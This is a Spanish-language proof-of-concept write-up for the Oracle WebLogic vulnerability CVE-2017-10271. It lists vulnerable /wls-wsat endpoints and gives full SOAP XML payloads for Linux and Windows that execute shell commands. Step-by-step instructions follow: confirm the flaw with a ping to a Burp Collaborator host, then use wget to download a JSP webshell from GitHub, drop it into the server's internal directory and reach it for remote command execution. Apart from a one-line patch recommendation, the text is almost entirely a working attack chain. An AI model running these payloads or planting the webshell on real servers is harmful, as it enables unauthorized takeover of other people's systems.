WebLogic CVE-2017-10271

Instalacion para POC:

1.- sudo docker pull zhiqzhao/ubuntu_weblogic1036_domain

2.- sudo docker run -d -p7001:7001 -p80:7001 zhiqzhao/ubuntu_weblogic1036_domain

Descripcion:

Vulnerabilidad en el componente Oracle WebLogic Server de Oracle Fusion Middleware (subcomponente: WLS Security). Las versiones compatibles que se ven afectadas son 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 y 12.2.1.2.0. Una vulnerabilidad fácilmente explotable permite que un atacante no autenticado con acceso a la red a través de T3 ponga en peligro el servidor webLogic de Oracle.

Impacto:

Los ataques exitosos de esta vulnerabilidad pueden resultar en la toma de control de Oracle WebLogic Server.

URLs Posibles:

/wls-wsat/CoordinatorPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/ParticipantPortType

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/RegistrationRequesterPortType11

Vector de Ataque Para Linux:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

  <soapenv:Header>

    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

      <java>

        <object class="java.lang.ProcessBuilder">

          <array class="java.lang.String" length="3">

            <void index="0">

              <string>/bin/sh</string>

            </void>

            <void index="1">

              <string>-c</string>

            </void>

            <void index="2">

              <string>ping xxxx.burpcollaborator.net</string>

            </void>

          </array>

          <void method="start"/>

        </object>

      </java>

    </work:WorkContext>

  </soapenv:Header>

  <soapenv:Body/>

</soapenv:Envelope>

Vector de Ataque para Windows:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

  <soapenv:Header>

    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

      <java>

        <object class="java.lang.ProcessBuilder">

          <array class="java.lang.String" length="3">

            <void index="0">

              <string>cmd</string>

            </void>

            <void index="1">

              <string>/c</string>

            </void>

            <void index="2">

              <string>ping xxx.burpcollaborator.net</string>

            </void>

          </array>

          <void method="start"/>

        </object>

      </java>

    </work:WorkContext>

  </soapenv:Header>

  <soapenv:Body/>

</soapenv:Envelope>

Pasos a seguir:

Se ejecutaron pruebas de seguridad con los dos vectores de ataques para windows y linux en todos los puntos finales (URLs posibles) posibles en la aplicacion.

1.- Enviar los payloads a todos los posibles puntos finales de la aplicacion y ver si burp collaborator atrapa el ping enviado.

2.- En caso de responder y ser vulnerable, utilizar el siguiente comando entre <string>tucomando</string>

/usr/bin/wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp;mv cmd.jsp servers/AdminServer/tmp/_WL_internal/bea_wls_internal/*/war

3.- Accedemos a la siguiente ruta: http://HOSTVULNERABLE/bea_wls_internal/cmd.jsp

Solución:

Actualizar para aplicar el parche de esta vulnerabilidad.